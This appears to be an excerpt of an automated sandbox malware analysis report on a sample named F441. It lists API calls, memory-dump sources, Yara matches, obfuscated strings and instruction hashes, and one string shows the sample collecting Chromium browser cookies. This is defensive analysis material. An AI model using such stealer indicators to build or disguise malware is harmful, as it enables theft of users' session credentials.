                                                                                • String ID: 0$01$ZR\;$[hct${hmn
                                                                                • API String ID: 0-1484469362
                                                                                • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                                • Instruction ID: 1db013fc5542e8129d7bff52628b3c3bf51b59c604d0821c27acfc3959cd4664
                                                                                • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                                • Instruction Fuzzy Hash: 211201B02083818BE324CF58C4A4B6FBBE5BBD6348F144D1CE5A58B691D77AD409CB96
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02113FF4
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0211401D
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02114434
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02114462
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                                • Instruction ID: 506330352b7fd8f12d92625bd7f0a8fa6aa4daeb6b4a2221937f9d4f1c564011
                                                                                • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                                • Instruction Fuzzy Hash: BF3246B4500B009FD728CF29C495B17BBB2FB85314F158A5CE8A64BB99D774E80ACBD1
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                                                • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                                                • Opcode Fuzzy Hash: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                                                • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02113FF4
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0211401D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                                • Instruction ID: c1bb1dd623f42f681558518d42916328ff1f816934ac42641faec7145525575e
                                                                                • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                                • Instruction Fuzzy Hash: D63255B4500B009FD728CF29C494B17BBB2FB85314F158A5CD8A64BB89D774E80ACBD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: /V.W$2 B$J>;0$gdeb
                                                                                • API String ID: 1279760036-1943473526
                                                                                • Opcode ID: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                                                • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                                                • Opcode Fuzzy Hash: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                                                • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #M*O$.A+C$<Y9[$de
                                                                                • API String ID: 0-619215113
                                                                                • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                                • Instruction ID: 3caef78d64f9d476fef592a9e74382b52fb0a804ed11544417f038c6a4da6b67
                                                                                • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                                • Instruction Fuzzy Hash: 3E4168716483958BC728CF04C0A07ABF7F1FF86314F915A2CE9DA5B690D7B59805CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2PBb$Yceh$]hW9
                                                                                • API String ID: 0-1551782443
                                                                                • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                                • Instruction ID: 5ecda6a6761544bce744c52e4b0bb42ee94616903516ad486974ed066a99cfd8
                                                                                • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                                • Instruction Fuzzy Hash: AD924D70145B808EE726CF35C4A47E7BBE1BF16309F48496CD1EB8B282DB79610ACB51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$7452$JlRp
                                                                                • API String ID: 0-3284767125
                                                                                • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                                • Instruction ID: 964ec7beb679601015f02ae520212a211be6a72cca04fa4b36934bca63b58b3a
                                                                                • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                                • Instruction Fuzzy Hash: 5952AF70245B808FE335CF29C4A07A6BBE6BF56304F54896DC4EB8BA85C776B009CB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: 7452$7452$JlRp
                                                                                • API String ID: 2994545307-3284767125
                                                                                • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                                • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                                                • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                                • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"$R-,T$R-,T
                                                                                • API String ID: 0-1082949730
                                                                                • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                                • Instruction ID: dfccbb639e10e88d7ad2eaa155d39b7af149dbb04c76dab202cdde4c3e0afe15
                                                                                • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                                • Instruction Fuzzy Hash: 66B19D71A083618BC728CF18C490B6BB7E2FF88758F19861CF8995B361D735D925CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"$R-,T$R-,T
                                                                                • API String ID: 0-1082949730
                                                                                • Opcode ID: 097c3629edcab9a4efba3e8f93c32dca5dad52f6725115fe54fdaabd073b34a7
                                                                                • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                                                • Opcode Fuzzy Hash: 097c3629edcab9a4efba3e8f93c32dca5dad52f6725115fe54fdaabd073b34a7
                                                                                • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$8
                                                                                • API String ID: 0-46163386
                                                                                • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                                • Instruction ID: 99c95b9e47ff17ab21f50e82a8aa1a1c375c5330050ef0e0607b2c8aa2d885cd
                                                                                • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                                • Instruction Fuzzy Hash: C18267716083409FD7A1CF28C88079ABBE1BF88318F48892DFA9987791D375D954DF92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$8
                                                                                • API String ID: 0-46163386
                                                                                • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                                • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                                                • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                                • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$"
                                                                                • API String ID: 0-3758156766
                                                                                • Opcode ID: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                                                • Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
                                                                                • Opcode Fuzzy Hash: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                                                • Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction ID: c43dc9cabe2de9706df4e17496983e4702b3a8a14ae83c8f5824931186adfc6c
                                                                                • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction Fuzzy Hash: 92F170B0644B808FE339CF25C0A47A3BBE5BF56304F44896DC4EB8B685D77AA009CB51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                                                • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction ID: b26620ab2ec6bb47b95bd15f64e4773a4c1073b4c8a9e26742fc95e604f52d1c
                                                                                • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction Fuzzy Hash: 46F180B0645B808FE339CF25C0A47A3BBE5BF56304F44896DC4EB8B685D77AA009CB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                                                • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$IEND
                                                                                • API String ID: 0-707183367
                                                                                • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                                • Instruction ID: 364c85f06c823bb31809a7d247932c9efeb54b81aae69397f5955c6d539ecc52
                                                                                • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                                • Instruction Fuzzy Hash: 36E1BEB2A483449FD754CF28C88079FBBE1AF84304F05852DFA999B781D775E904DB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction ID: c714c074e18e67a207e1eaffbc14f31ef28713ff096c492269821138b54cb3f8
                                                                                • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction Fuzzy Hash: 9AD18170245B908FE3258F25C0A57E3BBE6BF56308F48896DC4EB4B685C77A6009CB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
                                                                                • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ]hiX$gdeb
                                                                                • API String ID: 0-4273025081
                                                                                • Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                                • Instruction ID: 8efb16796d372884df47e1877e09d097828e9ac6eeafc236761692ad7f512a12
                                                                                • Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                                • Instruction Fuzzy Hash: 41C1C4B1A493418FD714CF14C89176BB7E2EF89318F198A3DE89587380E736D985CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb
                                                                                • API String ID: 0-1883251077
                                                                                • Opcode ID: dadfc9a4520318b08f1e55189e06e8e41a168fd232f51a31a4105b0fbe4340ce
                                                                                • Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
                                                                                • Opcode Fuzzy Hash: dadfc9a4520318b08f1e55189e06e8e41a168fd232f51a31a4105b0fbe4340ce
                                                                                • Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb
                                                                                • API String ID: 0-1883251077
                                                                                • Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                                • Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
                                                                                • Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                                • Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                                • Instruction ID: fba0c56560f0148ad0bfeab676171ba279f6e05e820e7f16fadc20ae03177340
                                                                                • Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                                • Instruction Fuzzy Hash: 9F22A0B16483A18FD714CF18C890B2BBBE5BB89318F188A2DF5D497391C775D819CB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                                • Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
                                                                                • Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                                • Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                                • Instruction ID: e3213728ccb895ed7b99e90daa4fde58df40b7e06253d1712cf56298e04ade1d
                                                                                • Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                                • Instruction Fuzzy Hash: AC123771948381DBEB95CE18C0A13AFBFE2AB95314F08851DEADD47BD1C3398445E782
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: IO
                                                                                • API String ID: 0-3981347273
                                                                                Strings
                                                                                • v[info] collected cookies file of the chromium-based browser, xrefs: 02106A1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: v[info] collected cookies file of the chromium-based browser
                                                                                • API String ID: 0-1851104220
                                                                                Strings
                                                                                • v[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: v[info] collected cookies file of the chromium-based browser
                                                                                • API String ID: 0-1851104220
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,
